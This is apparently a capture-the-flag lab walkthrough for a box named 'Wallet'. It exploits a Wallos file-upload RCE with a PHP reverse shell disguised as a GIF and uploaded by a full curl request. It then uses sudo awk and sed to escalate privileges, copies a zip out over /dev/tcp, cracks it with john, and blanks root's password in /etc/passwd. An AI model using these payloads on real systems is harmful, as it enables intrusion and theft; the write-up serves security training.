Wallet
export TARGET_IP=172.17.0.2
nmap -p- $TARGET_IP
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Web Server Enumeration
Further investigation revealed a web application running on port 80. This application appears to be a part of a larger domain: wallet.dl
. Clicking on the "Get A Quote" button redirected to http://panel.wallet.dl/registration.php
. This link was inaccessible due to the missing wallet.dl
hostname mapping.
Hostname Resolution
To access the web application, the wallet.dl
hostname was mapped to the target IP address in the /etc/hosts
file:
echo "$TARGET_IP wallet.dl" | sudo tee -a /etc/hosts
After mapping the hostname, successful access to http://panel.wallet.dl/
was achieved (after registering and login).
Application Fingerprinting
The "About" section of the web application disclosed the software in use: Wallos v1.11.0.
A vulnerability search on Google revealed a critical vulnerability: Wallos < 1.11.2 - File Upload Remote Code Execution (RCE).
Vulnerability Analysis
- Vulnerability: Authenticated users can bypass file upload restrictions when creating a new subscription.
- Impact: This vulnerability allows an attacker to upload a malicious PHP file (webshell) to the server, leading to Remote Code Execution (RCE). With RCE, an attacker can execute arbitrary operating system commands on the vulnerable server, potentially gaining complete control.
- Affected Versions: Wallos versions before 1.11.2.
Exploitation
1. Authentication
Obtain valid credentials to log into the Wallos application. Use the browser's developer tools (Network tab) to capture the PHPSESSID
cookie value after successfully logging in.
2. Navigate to "New Subscription"
Access the functionality to add a new subscription within the application.
3. Prepare the Malicious Payload
A reverse shell payload is more versatile than a basic webshell. Create a reverse shell script on the command line and disguise it as an image file:
GIF89a<?php system("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'"); ?>
Replace YOUR_IP
and YOUR_PORT
with the attacker's IP address and port to establish the reverse shell connection.
4. Start a Listener
Set up a listener on your machine to catch the reverse shell:
nc -lvnp YOUR_PORT
5. Upload and Bypass File Restrictions
Send a crafted POST request using curl
to upload the reverse shell payload while bypassing the file type restrictions:
curl -X POST \
-H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
-F "name=test_reverse_shell" \
-F "logo=@shell.php;type=image/jpeg" \
-F "logo-url=" \
-F "id=" \
-F "price=123" \
-F "currency_id=1" \
-F "frequency=1" \
-F "cycle=3" \
-F "next_payment=2000-01-01" \
-F "payment_method_id=1" \
-F "category_id=1" \
-F "payer_user_id=1" \
-F "url=" \
-F "notes=" \
http://panel.wallet.dl/endpoints/subscription/add.php
Note: Replace YOUR_SESSION_ID
with the session ID captured earlier.
6. Verify the Upload
Check the server's response for confirmation of a successful upload. The uploaded file's location is usually specified in the response (e.g., /images/uploads/logos/12345-shell.php
).
7. Trigger the Reverse Shell
Access the uploaded file in a browser or via curl
to trigger the reverse shell. For example:
curl http://panel.wallet.dl/images/uploads/logos/12345-shell.php
Upon triggering the file, the reverse shell connection should establish between the target server and the attacker's listener.
Privilege Escalation to Pylon
1. Analyze Sudo Permissions
The sudo -l
command reveals the following:
Matching Defaults entries for www-data on ece753885f47:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin,
use_pty
User www-data may run the following commands on ece753885f47:
(pylon) NOPASSWD: /usr/bin/awk
This output indicates that the www-data
user can execute the /usr/bin/awk
command as the pylon
user without providing a password.
2. Exploit the Sudo Privilege
The awk
command can be used to execute system commands. Since it can be run as pylon
without a password, we can spawn a shell with elevated privileges:
sudo -u pylon /usr/bin/awk 'BEGIN {system("/bin/bash")}'
Privilege Escalation to Pinguino
In /home/pylon
we found secretitotraviesito.zip
which is is password-protected. We need to crack it to retrieve its contents.
Step 1: Transfer the File to Your Machine
Since we already have access to the target machine as the pylon
user, the simplest way to transfer the ZIP file is via Netcat (nc) or SCP (if available).
Transfer with Netcat
On your local machine, set up a listener:
nc -lvnp 4444 > secretitotraviesito.zip
On the target machine, send the file to your listener:
cat secretitotraviesito.zip > /dev/tcp/YOUR_IP/4444
Step 2: Extract the ZIP Hash Using zip2john
The tool zip2john
, part of the John the Ripper suite, extracts password hashes from ZIP files into a format that john
can process.
Run the following command on your local machine:
zip2john secretitotraviesito.zip > ziphash.txt
Step 3: Crack the Password with john
Use john
with a suitable wordlist, such as rockyou.txt, to brute force the password:
john --wordlist=/usr/share/wordlists/rockyou.txt ziphash.txt
chocolate1 (secretitotraviesito.zip/notitachingona.txt)
Monitor Progress
To check the cracking progress, use:
john --show ziphash.txt
secretitotraviesito.zip/notitachingona.txt:chocolate1:notitachingona.txt:secretitotraviesito.zip::secretitotraviesito.zip
1 password hash cracked, 0 left
Results
The password chocolate1
can now be used to unzip the file:
unzip secretitotraviesito.zip
Alternative Cracking Tools
If john
does not succeed, try fcrackzip, which is also designed for password-protected ZIP files:
fcrackzip -D -p /usr/share/wordlists/rockyou.txt secretitotraviesito.zip
-D
: Specifies a dictionary-based attack.-p
: Points to the password list.
Privilege Escalation to Root
After extracting the contents of secretitotraviesito.zip
, the file notitachingona.txt
revealed the following credentials:
cat notitachingona.txt
> pinguino:pinguinomaloteh
Using these credentials, we can escalate to the pinguino
user and analyze its privileges.
Step 1: Switch to the pinguino
User
On the target machine, use the following command to switch users:
su pinguino
# Password: pinguinomaloteh
whoami
> pinguino
Step 2: Check Sudo Privileges
Run sudo -l
to list the commands pinguino
can execute with elevated privileges:
sudo -l
Matching Defaults entries for pinguino on ece753885f47:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin,
use_pty
User pinguino may run the following commands on ece753885f47:
(ALL) NOPASSWD: /usr/bin/sed
This indicates that pinguino
can execute the sed
command as any user, including root, without providing a password.
Step 3: Exploit sed
for Privilege Escalation
The sed
command can execute arbitrary shell commands. As pinguino
, use the following command to spawn a root shell:
https://gtfobins.github.io/gtfobins/sed/#sudo
sudo sed -n '1e exec sh 1>&0' /etc/hosts
Alternative
sudo sed -i 's/root:x:/root::/g' /etc/passwd
sed
: Stream editor that performs text substitution.-i
: Edits the file in place, directly modifying/etc/passwd
.'s/root:x:/root::/g'
: Substitution command:s/
starts the substitution.root:x:
matches the line in/etc/passwd
where the root user's password hash is stored (x
indicates the password is stored in/etc/shadow
).root::
replaces the matched text, effectively removing the password for the root account./g
applies the substitution globally (to all matches, though only one line applies here)./etc/passwd
: The target file being modified.
Step 4: Verify Root Access
After running the command, confirm that you now have root privileges:
whoami
> root